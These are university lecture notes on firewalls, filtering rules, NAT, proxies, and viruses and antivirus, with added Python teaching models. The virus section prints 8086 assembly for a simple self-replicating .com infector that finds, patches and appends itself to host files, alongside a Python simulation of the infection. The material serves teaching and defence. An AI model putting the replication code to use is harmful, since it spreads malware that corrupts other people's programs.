Security in Information Systems: Lecture Notes in Network Security
Due on February 3, 2011
Jordi Nin
Department of Computer Architecture (DAC)
Universitat Politecnica de Catalunya (UPC)

2 - Network Security and Protection
Security in Information Systems (SSI)
Jordi Nin, DAC, UPC
Contents
1 Perimetral Security: Firewalls
  • Introduction
  • Firewall Topologies
  • Filtering Rules
  • Application Level Filtering
2 Viruses, Worms and Trojans
  • Introduction
  • Viruses Main Components
  • Antivirus
3 Point to Point Security

Perimetral Security: Firewalls
Definition
A firewall is a part of a computer system or network designed to block unauthorized access while permitting authorized communications. It is a device or set of devices that is configured to permit or deny network transmissions based on a set of rules and other criteria.
When do we need a firewall?
↓
Any time we need to connect a secure network to an insecure network
Possible Attacks
According to Donn B. Parker, senior consultant at Stanford Research Institute:
• Tampering or Data Diddling → false data insertion
• Trojan Horse → a program not acting as expected
• Data leakage → unauthorized data dissemination
• Spoofing → using another computer's IP address
• Denial of Service attacks
• ...
Preliminary Definitions
• Firewall: used to refer to the security policy and security strategies
• Firewall system: set of hardware and software implementing a firewall
• Bastion Host: a hardened host exposed to an insecure network
• Packet: basic Internet communication unit (datagram)
• Dual-homed host: a computer with two network interfaces
• Network perimeter or Demilitarized Zone (DMZ): a network added between the insecure network and the secure network that we need to protect
Types of Firewall
• Packet filter: packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules
• Circuit-level firewall: applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking
• Application gateway: applies security mechanisms to specific applications, such as FTP and Telnet servers
• Proxy server: intercepts all messages entering and leaving the network, acting as an intermediary between clients and servers. The proxy server hides the true network addresses
Why not implement security in the hosts?
There are many reasons, for example...
• administering security at many points is more difficult than at a single one
• hosts execute a large number of programs, i.e. the risk increases
• network monitoring becomes easier
• the internal network structure is hidden
• ...
What can a firewall do?
• It provides a single point of defense, allowing controlled and audited access to the services provided
• It reinforces the protected systems' own security
• It implements a security policy for access to the secure network
• It can monitor incoming / outgoing traffic
• It can limit the exposure to an insecure network
• It may become the point where security decisions are taken, since all traffic goes across it
What can a firewall not do?
• It cannot protect the network against malicious attacks from inside the secure network
• It cannot protect the network against traffic that does not go across it
• It cannot protect the network against bugs in authorized services
• Any application data going across it has the potential of causing problems (e.g. Trojans)
• If the security policy is not deny by default, it cannot protect the network against new attacks

Firewall Topologies
A Simple Dual-Homed Firewall
The dual-homed firewall is one of the simplest ways to use a firewall. The Internet comes into the firewall directly via a dial-up modem. You can't have a DMZ.
[Figure: Internet - Firewall - Switch or Hub - NetWare Server / Desktop PC]
The firewall takes care of passing packets that pass its filtering rules between the internal network and the Internet, and vice versa. The two "homes" refer to the two networks that the firewall is part of: one interface connected to the outside network, and the other connected to the inside network
A Two-Legged Network with a Fully Exposed DMZ
The router (Internet access) is connected to a hub. Servers that want direct access to the outside world (unfiltered by the firewall) and one of the firewall's net adapters also connect to this hub. The other firewall net adapter connects to the internal hub. PCs that need to be protected are connected to this second hub
[Figure: Internet - Switch or Hub (Public Network / DMZ Zone: Public Webserver, Public Mailserver) - Firewall - Switch or Hub (Internal Network: Desktop PC, Netware Server)]
• Advantages: the firewall needs only two network cards. This simplifies the configuration of the firewall
• Drawbacks: the DMZ network is totally exposed to the Internet
Restricted DMZ via Dialup Firewall
To protect the DMZ network one solution is to build a second router/firewall. This is useful if PPP is used. One machine is the exterior router/firewall (1). It is responsible for creating the PPP connection and controls the access to the DMZ zone. Firewall 2 is a standard dual-homed host and its job is to protect the internal network
[Figure: Internet - Firewall 1 (ppp dialup) - Switch or Hub (DMZ Zone: Public Webserver, Public Mailserver) - Firewall 2 - Switch or Hub (Internal Network 1 / Internal Network 2: Desktop PC, Netware Server)]
The Three-Legged Firewall
We need to add one network card in the firewall for the DMZ
[Figure: Internet - Firewall - Switch or Hub (DMZ Zone: Public Webserver, Public Mailserver); Firewall - Switch or Hub (Internal Network 1 / Internal Network 2: Desktop PC, Netware Server)]
• Advantages: DMZ IP masquerading is possible, only one public IP address is needed
• Drawbacks: one extra net card → additional complexity

Filtering Rules
Basic Security Policies
• Allow access to a service unless it is explicitly denied
  • More comfortable for users
  • Easier to administer
  • Less secure → it can't prevent unknown attacks or bugs
• Deny access to a service unless it is explicitly allowed
  • More secure, since it is very difficult to know which services are secure and which are not
  • More restrictive and less comfortable for users
Filtering Rules
Filtering rules are a set of rules for blocking/allowing certain network traffic, based on a certain port number, protocol type, ...
Possible filtering criteria
• Origin/destination address (or network)
• Origin/destination port numbers (well-known or private)
• Protocol type (IP/TCP/UDP/ICMP)
• Connection establishment
Filtering Rule Format
iprule position action [filtering options]
• position: rule order
• action: {PERMIT | DENY}
• options:
  • -i: input interface
  • -o: output interface
  • -p: communication protocol → {IP | TCP | UDP | ICMP}
  • -s: source IP → {NETID+WILDCARD | HOST+IP | ANY}
  • -d: destination IP → {NETID+WILDCARD | HOST+IP | ANY}
  • -sport: source port → [port number:port number]
  • -dport: destination port → [port number:port number]
  • -state: connection state → {NEW, ESTABLISHED}
Wildcards
A wildcard mask is a 32-bit mask. It points out the IP address bits that have to be checked: a 0 mask bit indicates that the corresponding IP address bit has to be checked, a 1 mask bit that it is ignored.
Example
• 145.34.5.6 0.0.0.0 → host 145.34.5.6
• 145.34.5.6 255.255.255.255 → ANY
• 145.34.5.6 0.0.0.255 → 145.34.5.0/24
Filtering Rules & Net Interfaces
[Figure: Internet - eth0 (in/out) - Firewall - eth1 (in/out) - Internal Network]
Example
Internal hosts may only access the WWW service and nothing else
• Rule set 1 (outbound, eth1 → eth0):
  • iprule 1 permit -p TCP -i eth1 -o eth0 -dport 80
  • iprule 2 deny -i eth1 -o eth0
  • iprule 3 permit
• Rule set 2 (inbound, eth0 → eth1):
  • iprule 1 permit -p TCP -i eth0 -o eth1 -sport 80
  • iprule 2 deny -i eth0 -o eth1
  • iprule 3 permit
Rule Order
Rules are only checked until a packet matches!
These two rule sets are completely different:
Rule set 1
• iprule 1 deny -p ICMP
• iprule 2 permit -p IP
Rule set 2
• iprule 1 permit -p IP
• iprule 2 deny -p ICMP
The first rule set rejects all ICMP packets, while they are accepted with the second set (IP includes ICMP, so rule 1 already matches them and rule 2 is never reached)
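To see the rule format, the wildcard masks and the first-match ordering above at work, here is a toy packet filter that parses the slides' iprule syntax and evaluates it. It is an added example, not code from the lecture notes or from any real firewall: the rule sets are the ones on the previous slides, while the packets, addresses (documentation ranges) and the default verdict for a packet matching no rule (deny) are this example's own constructions. It also shows a caveat a practitioner should draw from rule set 2 of the interfaces example: a stateless "permit -sport 80" lets anyone who sets their source port to 80 reach any internal port, which is exactly what the -state ESTABLISHED option is for.

```python
"""Toy packet filter for the slides' `iprule` format (added example)."""
import ipaddress

OPTIONS = ("-i", "-o", "-p", "-s", "-d", "-sport", "-dport", "-state")


def parse_rule(text):
    """Parse 'iprule position action [options]'. A -s/-d value may be two
    words ('HOST 10.0.0.1', '145.34.5.6 0.0.0.255'), so a value runs until
    the next option token."""
    tok = text.split()
    if len(tok) < 3 or tok[0] != "iprule" or tok[2].upper() not in ("PERMIT", "DENY"):
        raise ValueError("bad rule: " + text)
    rule = {"position": int(tok[1]), "action": tok[2].upper()}
    i = 3
    while i < len(tok):
        if tok[i] not in OPTIONS:
            raise ValueError("unknown option " + tok[i])
        j = i + 1
        while j < len(tok) and tok[j] not in OPTIONS:
            j += 1
        if j == i + 1:
            raise ValueError("missing value for " + tok[i])
        rule[tok[i]] = " ".join(tok[i + 1:j])
        i = j
    return rule


def addr_match(addr, spec):
    """Wildcard-mask semantics of the slides: a 0 mask bit means the address
    bit is checked, a 1 mask bit means it is ignored."""
    if spec.upper() == "ANY":
        return True
    words = spec.split()
    a = int(ipaddress.IPv4Address(addr))
    if words[0].upper() == "HOST":
        return a == int(ipaddress.IPv4Address(words[1]))
    net = int(ipaddress.IPv4Address(words[0]))
    wildcard = int(ipaddress.IPv4Address(words[1]))
    checked_bits = wildcard ^ 0xFFFFFFFF
    return (a ^ net) & checked_bits == 0


def port_match(port, spec):
    lo, _, hi = spec.partition(":")
    return port is not None and int(lo) <= port <= int(hi or lo)


def rule_matches(rule, pkt):
    proto = rule.get("-p", "IP").upper()
    return all((
        rule.get("-i", pkt["in"]) == pkt["in"],
        rule.get("-o", pkt["out"]) == pkt["out"],
        proto == "IP" or proto == pkt["proto"],          # IP includes TCP/UDP/ICMP
        "-s" not in rule or addr_match(pkt["src"], rule["-s"]),
        "-d" not in rule or addr_match(pkt["dst"], rule["-d"]),
        "-sport" not in rule or port_match(pkt["sport"], rule["-sport"]),
        "-dport" not in rule or port_match(pkt["dport"], rule["-dport"]),
        "-state" not in rule or rule["-state"].upper() == pkt["state"],
    ))


def evaluate(rules, pkt):
    """Rules are checked in position order and only until the first match.
    A packet matching no rule is dropped (deny by default: this example's choice)."""
    for rule in sorted(rules, key=lambda r: r["position"]):
        if rule_matches(rule, pkt):
            return rule["action"], rule["position"]
    return "DENY", None


def packet(inb, outb, proto, src, dst, sport=None, dport=None, state="NEW"):
    return {"in": inb, "out": outb, "proto": proto, "src": src, "dst": dst,
            "sport": sport, "dport": dport, "state": state}


def ruleset(*lines):
    return [parse_rule(line) for line in lines]


# The two rule sets of the slides (eth0 = Internet side, eth1 = internal side).
RULESET_1 = ruleset("iprule 1 permit -p TCP -i eth1 -o eth0 -dport 80",
                    "iprule 2 deny -i eth1 -o eth0", "iprule 3 permit")
RULESET_2 = ruleset("iprule 1 permit -p TCP -i eth0 -o eth1 -sport 80",
                    "iprule 2 deny -i eth0 -o eth1", "iprule 3 permit")
# Same intent with the -state option: only replies of established connections return.
RULESET_2_STATEFUL = ruleset(
    "iprule 1 permit -p TCP -i eth0 -o eth1 -sport 80 -state ESTABLISHED",
    "iprule 2 deny -i eth0 -o eth1", "iprule 3 permit")
# The rule-order slide: the same two rules in opposite order.
ICMP_FIRST = ruleset("iprule 1 deny -p ICMP", "iprule 2 permit -p IP")
IP_FIRST = ruleset("iprule 1 permit -p IP", "iprule 2 deny -p ICMP")

# Constructed sample traffic (documentation address ranges).
WEB = packet("eth1", "eth0", "TCP", "10.0.0.5", "198.51.100.20", 40000, 80)
SSH_OUT = packet("eth1", "eth0", "TCP", "10.0.0.5", "198.51.100.20", 40001, 22)
WEB_REPLY = packet("eth0", "eth1", "TCP", "198.51.100.20", "10.0.0.5", 80, 40000, "ESTABLISHED")
PROBE = packet("eth0", "eth1", "TCP", "203.0.113.9", "10.0.0.5", 80, 22)   # attacker picks sport 80
PING = packet("eth0", "eth1", "ICMP", "203.0.113.9", "10.0.0.5")

if __name__ == "__main__":
    for label, rules, pkt in (("web", RULESET_1, WEB), ("ssh out", RULESET_1, SSH_OUT),
                              ("reply", RULESET_2, WEB_REPLY), ("probe/stateless", RULESET_2, PROBE),
                              ("probe/stateful", RULESET_2_STATEFUL, PROBE),
                              ("ping/icmp first", ICMP_FIRST, PING), ("ping/ip first", IP_FIRST, PING)):
        print(f"{label:16s} -> {evaluate(rules, pkt)}")
```

Run as a script to print the verdicts: the probe from 203.0.113.9 to port 22 is permitted by the stateless rule set 2 (rule 1 matches on source port 80 alone) and denied by the stateful variant, and the ping is dropped or passed depending only on the order of the two rules.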
Hiding Network Internals
Firewalls hide the structure of internal networks, but how?
↓
NAT (Network Address Translation)
↓
NAT is the process of modifying network address information in IP packet headers while in transit across a traffic routing device, for the purpose of remapping one IP address space into another
Types of NAT
NAT is out of the scope of this subject... just a small reminder
Address classification
• Inside local address: address of an internal host as seen in the internal network
• Inside global address: address of an internal host as seen from the Internet
• Outside local address: address of an external host as seen in the internal network
• Outside global address: address of an external host as seen from the Internet
• Static NAT: direct mapping between the inside local and global addresses. Internal hosts can be accessed from the Internet
  Mapping of static addresses (Cisco IOS-style notation):
    ip nat inside source static local-@ global-@
  Definition of the internal interface:
    ip nat inside network-interface
  Definition of the external interface:
    ip nat outside network-interface
• Dynamic NAT: a set of global addresses is dynamically assigned. An internal host has a different IP each time it accesses the Internet
  Creation of a global address set:
    ip nat pool name start-@ end-@
  Access-list to identify the addresses to be translated:
    access-list id permit network wildcard
  Mapping of dynamic NAT:
    ip nat inside source list id pool name
  Definition of the internal / external interfaces:
    ip nat inside network-interface
    ip nat outside network-interface
• PAT (Port Address Translation, NAT overload): all internal hosts share the same inside global IP; source ports are rewritten to avoid collisions
  Access-list to identify the addresses to be translated:
    access-list id permit network wildcard
  Mapping of overloaded dynamic NAT:
    ip nat inside source list id interface name overload
  Definition of the internal / external interfaces:
    ip nat inside network-interface
    ip nat outside network-interface
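A small model of what the overload keyword does, and of why NAT hides the internal network, as an added example (Python, not Cisco IOS, not from the slides): one inside global address, a translation table keyed by inside local address and port, and the reverse lookup that turns a reply back into the inside local address. All addresses are constructed documentation ranges; the port allocation policy (keep the original source port when it is free, otherwise take the next free port from 1024 up) is this example's assumption, and the ageing-out of idle entries that real devices do is omitted.

```python
"""PAT (NAT overload) translation table (added example, not Cisco IOS code)."""


class PAT:
    def __init__(self, inside_global, first_port=1024):
        self.inside_global = inside_global
        self.next_port = first_port
        self.outbound = {}   # (inside local ip, local port, proto) -> global port
        self.inbound = {}    # (global port, proto) -> (inside local ip, local port)

    def _allocate(self, wanted, proto):
        """Keep the host's own source port when free; otherwise the next free one
        (this example's policy; a collision is what the slides mean by 'ports are
        modified to avoid collisions')."""
        if (wanted, proto) not in self.inbound:
            return wanted
        while (self.next_port, proto) in self.inbound:
            self.next_port += 1
        port, self.next_port = self.next_port, self.next_port + 1
        return port

    def translate_outbound(self, pkt):
        """Rewrite src/sport of a packet leaving the internal network and record
        the mapping so the reply can be translated back."""
        key = (pkt["src"], pkt["sport"], pkt["proto"])
        if key not in self.outbound:
            gport = self._allocate(pkt["sport"], pkt["proto"])
            self.outbound[key] = gport
            self.inbound[(gport, pkt["proto"])] = (pkt["src"], pkt["sport"])
        return dict(pkt, src=self.inside_global, sport=self.outbound[key])

    def translate_inbound(self, pkt):
        """Rewrite dst/dport of a packet arriving from the Internet. Returns None
        when no mapping exists: unsolicited inbound traffic is dropped, which is
        why internal hosts are unreachable without a static entry."""
        entry = self.inbound.get((pkt["dport"], pkt["proto"]))
        if entry is None or pkt["dst"] != self.inside_global:
            return None
        local_ip, local_port = entry
        return dict(pkt, dst=local_ip, dport=local_port)


def demo():
    """Two internal hosts use the same source port towards the same server."""
    nat = PAT("203.0.113.1")
    a = nat.translate_outbound({"proto": "TCP", "src": "10.0.0.5", "sport": 40000,
                                "dst": "198.51.100.20", "dport": 80})
    b = nat.translate_outbound({"proto": "TCP", "src": "10.0.0.6", "sport": 40000,
                                "dst": "198.51.100.20", "dport": 80})
    # The server only ever sees the single global address and the rewritten ports.
    reply_a = nat.translate_inbound({"proto": "TCP", "src": "198.51.100.20", "sport": 80,
                                     "dst": "203.0.113.1", "dport": a["sport"]})
    reply_b = nat.translate_inbound({"proto": "TCP", "src": "198.51.100.20", "sport": 80,
                                     "dst": "203.0.113.1", "dport": b["sport"]})
    # Unsolicited connection attempt against the global address: no mapping, dropped.
    probe = nat.translate_inbound({"proto": "TCP", "src": "203.0.113.9", "sport": 5555,
                                   "dst": "203.0.113.1", "dport": 22})
    return a, b, reply_a, reply_b, probe


if __name__ == "__main__":
    for p in demo():
        print(p)
```

The first host keeps port 40000, the second is moved to 1024 because 40000 is already taken for TCP, and both replies are demultiplexed back to the right inside local address; the SSH probe from outside has no table entry and is dropped.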
Application Level Filtering
Description
A proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers
General procedure
1 A client connects to the proxy server, requesting a service (a file or web page) available from a different server
2 The proxy server evaluates the request according to its filtering rules
3 If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client
Possible Applications
• To keep machines behind it anonymous
• To speed up access to resources (using caching)
• To apply access policy to network services or content, e.g. to block undesired sites
• To log / audit usage
• To scan transmitted content for malware before delivery
• To scan outbound content, e.g. for data leak protection
• To circumvent regional restrictions
Proxy Types and Functions I
• Caching proxy servers accelerate service requests by retrieving content saved from a previous request. They keep local copies of frequently requested resources
• Web proxy servers serve as a web cache. Most proxy programs provide a way to deny access to URLs specified in a blacklist (content filtering). Some web proxies also reformat web pages for a specific purpose or audience, such as for cell phones and PDAs
• Anonymous proxy servers attempt to anonymize web traffic
  • Open proxy (without access control): the web server receives requests from the anonymizing proxy server, and thus does not receive information about the end user's address (note that the requests are not anonymous to the anonymizing proxy server itself)
  • Closed proxy (with access control): authorized users must log on to gain access to the web. The proxy administrator (a company) can thereby track usage to individuals
Proxy Types and Functions II
• Intercepting (transparent) proxy servers combine a proxy server with a gateway or router (with NAT capabilities). Connections made by client browsers through the gateway are diverted to the proxy without client-side configuration (or knowledge). They are commonly used in businesses to prevent avoidance of acceptable use policy, and to ease administrative burden.
• Reverse proxy is a server installed in the neighborhood of one or more web (application) servers. All traffic coming from the Internet with a destination of the 'client' servers goes through the proxy server. There are several reasons for installing reverse proxy servers:
  • Encryption / SSL acceleration: the back-end servers share the single SSL certificate and private key installed on the proxy, which terminates the SSL connections
  • Load balancing: connections are distributed among several servers
  • Security: it is an additional layer of defense and it can protect against some OS- and web-server-specific attacks. However, it does not provide any protection against attacks on the web application or service itself
  • Additional services: data compression, caching of static content

Viruses, Worms and Trojans
Historical evolution
The word virus has become a generic term describing a number of different types of attacks on computers using malicious code
↓
1961, Bell Labs, three programmers create a game called Darwin, the ancestor of Core War. The object of the game is to cause all processes of the opposing program(s) to terminate, leaving your program in sole possession of the machine
↓
Consequence → the computer crashes!
Economic cost
It is a safe bet that billions of dollars worth of damage have been done over the three decades since malicious code hit the big time (1980)
Why?
• Inactivity time due to the infection
• Cost of the cleaning time
• Cost of the countermeasures (antivirus)
Viruses and Public Health
Why should you care about malicious code?
• You would not want to become a carrier of some awful disease → neither should your computer
• nor would you want your machine used to infect others
↓
A classic example is the malicious code planted on many machines to mount a DDoS attack
Difference between Virus and Worm
Virus
A virus is a code fragment that copies itself into a larger program, modifying that program and depending on it. A virus executes only when its host program begins to run. The virus then replicates itself, infecting other programs as it reproduces
Worm
A worm is an independent program that reproduces by copying itself from one computer to another, usually over a network. Unlike a virus, a worm keeps its independence; it usually doesn't modify other programs
Trojan horses
A Trojan horse is a code fragment that hides inside a program and performs a disguised function
Example
• A Trap door is a mechanism built into a system by its designer. Its function is to give the designer a way to sneak back into the system, circumventing normal system protection
• A Masquerade is a generic name for a program that tricks an unsuspecting user into giving away privileges.
• A Spoof is a technique used for misdirection and concealment. For instance, a communication that the sender wishes to transmit anonymously is tagged with a false return address
Malware Categories

Malware type | Incubation / Latency | Hidden on host | Propagation / Replication | Payload / Attack
Worm         | Short                | No             | Automatic                 | Fixed
Virus        | Medium               | Yes            | Automatic                 | Fixed
Trojan       | Long                 | Yes (or not)   | Manual                    | Fixed
Spyware      | Long (infinite)      | Yes            | Automatic (or manual)     | Fixed
Bots         | Long                 | Yes (or not)   | Automatic                 | Remote control

Viruses Main Components
Viruses Schema
A virus has two components:
• Replication: the survival of a virus is based on its ability to reproduce
  ... So how do I make a program reproduce? ...
  Easy: the simplest common viruses infect .com files (DOS executables). This file format always has its code starting at offset 0x100 (the image is loaded right after the 256-byte PSP), so the virus attaches itself to the end of the file and replaces the first instruction at 0x100 with a jump to its own start address. Thus the viral code executes whenever the file is run; it then looks for other, uninfected, .com files and infects them
• Payload: it is usually activated just after the replication step or by a trigger, such as a date, and it performs a set of bad things like:
  • Make changes to the machine's protection state
  • Make changes to user data (e.g. trash the disk)
  • Lock the network (e.g. start replicating at maximum speed)
  • Steal resources for some unauthorized task (e.g. use the CPU for DES key search)
Viruses Schema
Basic Virus Procedure
1 Search for a file to infect
2 Open the file to see if it is infected
3 If infected, search for another file
4 Else, infect the file
5 If payload execution conditions are met, it is executed
6 Return control to the host program
Example of a Simple Virus (hello world!) I
[Figure: layout of an infected .com file on disk and in main memory: jump (3 bytes) | original code | data | virus appended at offset com_size]

Virus Assembler Code

    vcode segment 'code'
    org 100h                      ; .com files are loaded at offset 100h, after the PSP
    assume cs:vcode,ds:vcode,es:vcode
    start proc far
    begin:
        push cs                   ; store CS twice...
        push cs
        pop ds                    ; ...and bring it out as DS and ES
        pop es
        call fake_proc            ; pushes the IP of the next instruction on the stack
    fake_proc proc near
    fake_proc endp
        pop bp                    ; BP <- that IP (107h when the virus runs from 100h)
        sub bp,107h               ; BP = displacement of this virus copy from 100h;
                                  ; every data item is addressed as [bp+label]

Virus Assembler Data

        buffer   db 7 dup(0)      ; the host's original first bytes (3 are used)
        length   db 2 dup(0)      ; host file length = jump displacement
        file_inf db '*.COM',0     ; search pattern for victims
        jump     db 0E9h,0        ; opcode of jmp rel16 (the slides write the byte as a
                                  ; quoted character; E9h is the value the code needs)
    start endp                    ; end of main procedure
    vcode ends                    ; end of code segment
    end begin                     ; END. Entry point: begin
Example of a Simple Virus (hello world!) II
1 Search for a file
2 Open the file to see if it is infected

Virus Replication Code

        ; Find the first .com file in the directory (DOS find-first)
        mov ah,4eh
        lea dx,[bp+file_inf]      ; DS:DX = offset of file_inf ('*.COM')
        mov cx,0000h              ; entry attributes
        int 21h                   ; fills the DTA (default DTA at PSP:80h)
        ; Open file
        mov ah,3dh                ; open file
        mov al,00000010b          ; read/write access
        mov dx,009eh              ; DX <- offset of the filename inside the DTA
        int 21h                   ; returns the handle in AX
        push ax                   ; and store it on the stack
Example of a Simple Virus (hello world!) III
4 Else, infect the file
5 If payload execution conditions are met, it is executed
6 Return control to the host program

Virus Infection Code (I): save the initial bytes of the .com file

        pop bx                    ; take the handle from the stack to BX...
        push bx                   ; ...and store it again
        mov ah,3fh                ; read file
        mov cx,0003h              ; read 3 bytes
        lea dx,[bp+buffer]        ; and store them in buffer (data segment)
        int 21h
        mov ax,4200h              ; move the file pointer to the beginning of the program
        mov cx,0000h
        mov dx,0000h
        int 21h
        ; Write the first byte (jmp opcode)
        mov ah,40h
        mov cx,1
        lea dx,[bp+jump]
        int 21h                   ; write the first byte of the jump (E9h)

Virus Infection Code (II): calculating the file length

        mov cx,2
        mov si,009ah              ; SI <- offset of the file size inside the DTA
        lea di,[bp+length]        ; DI <- file length offset
        rep movsb                 ; copy the 2 bytes (DS = ES = CS)
        ; Complete the jump instruction
        mov ah,40h
        mov cx,2
        lea dx,[bp+length]
        int 21h                   ; write the 2-byte displacement after the E9h
        ; Move the pointer to the end
        mov ax,4202h              ; move the write pointer to the end of the program
        mov cx,0000h
        mov dx,0000h
        int 21h
        add word ptr [bp+length],3   ; restore length

Virus Infection Code (III): copy the virus to the program

        pop bx                    ; restore the handle
        mov ah,40h
        mov cx,length             ; number of bytes to copy (the size of the virus code;
                                  ; the slides reuse the name length for it)
        lea dx,[bp+begin]         ; start copying from the virus entry point
        int 21h
        ; Payload execution: print "hello world!" (pseudo-instruction in the slides,
        ; not 8086 code)
        ; Copy the buffer holding the first 3 bytes of the host back into memory
        mov cx,0003h
        mov di,0100h
        lea si,[bp+buffer]
        rep movsb
        mov ax,0100h              ; address needed to execute the host
        jmp ax
Graphical Description
[Figure, reconstructed as text]
Step 0: the original .com file on disk
  | com file (length bytes) |
Step 1 (failure): after one infection
  | jmp | com file | virus (jump displacement = length; buffer keeps the original first bytes) |
Step 2 (com executes): after a second infection
  | jmp v2 | com file | virus1 (jmp original) | virus2 (jmp v1) |
Note that the second virus infection is executed first
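The basic virus procedure and the figure above, modelled on bytes (added example, not part of the lecture notes and not machine code): a constructed host image, a virus body represented by a tagged chunk that carries the saved 3 bytes (the assembler's buffer), an infect step that does what the listing does (save 3 bytes, write a jmp at 0x100, append the body, refuse to infect twice) and a toy executor that follows the jumps, so one can watch the second infection run first and hand over to the first, which hands over to the host. One detail worth checking against the assembler listing: a jmp rel16 is relative to the byte after the 3-byte instruction, so the displacement that lands exactly on the appended body is the host length minus 3.

```python
"""Byte-level model of the slides' .com infection (added example, not machine code).
Offsets are file offsets; add 0x100 to get the DOS memory address."""

JMP = 0xE9                          # x86 'jmp rel16': target = end of the 3-byte instruction + disp
TAG = b"<VIRUS "                    # stand-in for the virus code (the slides' real one is 8086 asm)
CHUNK_LEN = len(TAG) + 2 + 1 + 3    # tag, 2-byte name, '>', 3 saved host bytes ('buffer')


def is_infected(com, name):
    """Step 2: the virus looks for its own mark rather than for a leading jmp,
    because many clean .com files legitimately start with a jmp."""
    return TAG + name + b">" in com


def infect(com, name=b"V1"):
    """Steps 3-4: append the virus body and overwrite the first 3 bytes at 0x100
    with a jump to it. The saved bytes travel inside the body ('buffer')."""
    if is_infected(com, name):
        return com                                   # step 3: look for another file
    com = com.ljust(3, b"\0")                        # tiny hosts: pad to 3 bytes
    saved = com[:3]
    length = len(com)
    disp = length - 3                                # see lead-in: relative to 0x103
    header = bytes([JMP]) + disp.to_bytes(2, "little")
    return header + com[3:] + TAG + name + b">" + saved


def run(image, max_steps=16):
    """Toy executor: follows jmps, 'executes' a virus body (restore the host's
    first 3 bytes at 0x100 and jump there: steps 5-6) and stops at host code.
    Returns the order of execution, e.g. ['virus:V2', 'virus:V1', 'host']."""
    mem = bytearray(image)
    trace, pc = [], 0
    for _ in range(max_steps):
        if mem[pc] == JMP:
            disp = int.from_bytes(mem[pc + 1:pc + 3], "little", signed=True)
            pc = pc + 3 + disp
        elif mem[pc:pc + len(TAG)] == TAG:
            name = bytes(mem[pc + len(TAG):pc + len(TAG) + 2])
            saved = mem[pc + len(TAG) + 3:pc + CHUNK_LEN]
            trace.append("virus:" + name.decode())
            mem[0:3] = saved                         # buffer -> 0x100
            pc = 0                                   # jmp 100h: run the host
        else:
            trace.append("host")
            return trace
    raise RuntimeError("execution never reached the host")


HOST = b"HOST-PROGRAM-BYTES\xc3"    # constructed clean .com image (ends with 'ret')


def demo():
    once = infect(HOST, b"V1")
    again = infect(once, b"V1")      # same virus: mark found, nothing done
    twice = infect(once, b"V2")      # a second, different virus
    return {"clean": run(HOST), "once": run(once), "twice": run(twice),
            "reinfected": again is once,
            "disp": int.from_bytes(once[1:3], "little"), "body_at": len(HOST)}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:10s} {v}")
```

The trace for the doubly infected file is virus V2, then V1, then the host: each body restores "its" three saved bytes at 0x100 and jumps there, and for V2 those bytes are V1's jump.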
Antivirus
General Description
Virus protection software uses two main techniques.
• Signatures: antivirus (AV) solutions have relied strongly on signature-based scanning, also referred to as scan-string-based technology. The signature-based scan engine searches within given files for the presence of certain byte strings (often only in certain regions of the file). If these predefined strings are found, certain actions, like alarms or quarantine, can be triggered.
• Periodic analysis: the virus protection program can go looking for trouble. It can scan the various disks and memories of the computer, detecting and reporting suspicious code segments, and placing them in quarantine.
Signature problem!
Signature-based virus protection programs require a constantflow of new signatures in response to evolving attacks.Vendors stay alert for new viruses, determine the signatures,and then make them available as updated virus definitiontables to their users. Usually, users download new signaturesfrom the WWW periodically
Zero Day problem: It occurs when a user finds a new virus beforethe publisher discovers it and can issue an updated signature.
Even worse: Mutation!
Just as biological pathogens do, viruses can mutate to elude signature detection... but how? They have several options:
• the virus uses file compression software to change its signature while it is not active (the compressed body no longer contains the original byte string)
• the virus changes its own form by inserting extra useless instructions or random values
• the virus encrypts itself, leaving in clear only a small header containing the decryption code and the random key
Mutation examples
• a dummy mutation: use a NOT gate (inverter), v' = NOT(v), so 0010110 becomes 1101001; the code that undoes the NOT must be placed as the first virus instruction
• a not so dummy but still simple mutation: generate a random key and use a XOR gate, key db 1 dup(01101001b) and v' = XOR(v, key); applying the same XOR with the same key restores v
AV countermeasure: heuristic search methods
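The following is an added example (my code, not from the lecture notes) that ties the signature-scanning description above to the two mutations: a minimal region-aware scanner, the NOT and XOR transforms, and a scanner-side answer to a one-byte XOR key (brute-forcing all 256 keys, an assumption on my part; the slide only names heuristics as the countermeasure). The signature bytes are the 8086 encoding of the restore stub shown earlier; the host file is constructed.

```python
# Added example (mine, not from the lecture notes): a toy signature scanner
# and the NOT / XOR "mutations" from the slides. SIGNATURE is the 8086
# encoding of "mov cx,3 / mov di,100h / rep movsb" (the restore stub above);
# HOST is a constructed stand-in for a clean .com file.

SIGNATURE = bytes.fromhex("b90300bf0001f3a4")
VIRUS = SIGNATURE + bytes.fromhex("8d7610b80001ffe0")   # lea si,[bp+10h] / mov ax,100h / jmp ax
HOST = bytes(range(0x40, 0x80))


def infect(host: bytes, body: bytes) -> bytes:
    """Appending infector, as in the .com example: the body follows the host."""
    return host + body


def scan(data: bytes, signature: bytes, region=None) -> int:
    """Offset of `signature` in `data`, or -1. `region`=(start, end) restricts
    the search, as scanners do when a family is known to live in one part of
    the file (e.g. the tail of an appending infector)."""
    if region is None:
        return data.find(signature)
    start, end = region
    pos = data[start:end].find(signature)
    return -1 if pos < 0 else start + pos


def mutate_not(body: bytes) -> bytes:
    """The 'dummy' mutation v' = NOT(v). A real virus would prepend code undoing it."""
    return bytes((~b) & 0xFF for b in body)


def mutate_xor(body: bytes, key: int) -> bytes:
    """The XOR mutation with a one-byte key (key db 1 dup(01101001b) on the slide)."""
    return bytes(b ^ key for b in body)


def xray_xor(data: bytes, signature: bytes):
    """Scanner-side countermeasure (assumed here, not on the slide): try all 256
    one-byte keys and rescan. Returns (key, offset) or (None, -1).
    NOT is XOR with 0xFF, so the same loop also undoes the dummy mutation."""
    for key in range(256):
        pos = scan(mutate_xor(data, key), signature)
        if pos >= 0:
            return key, pos
    return None, -1


if __name__ == "__main__":
    plain = infect(HOST, VIRUS)
    print("plain infection, signature found at offset", scan(plain, SIGNATURE))
    for name, body in (("NOT", mutate_not(VIRUS)), ("XOR 0x69", mutate_xor(VIRUS, 0x69))):
        sample = infect(HOST, body)
        print(name, "static scan:", scan(sample, SIGNATURE), " x-ray:", xray_xor(sample, SIGNATURE))
```

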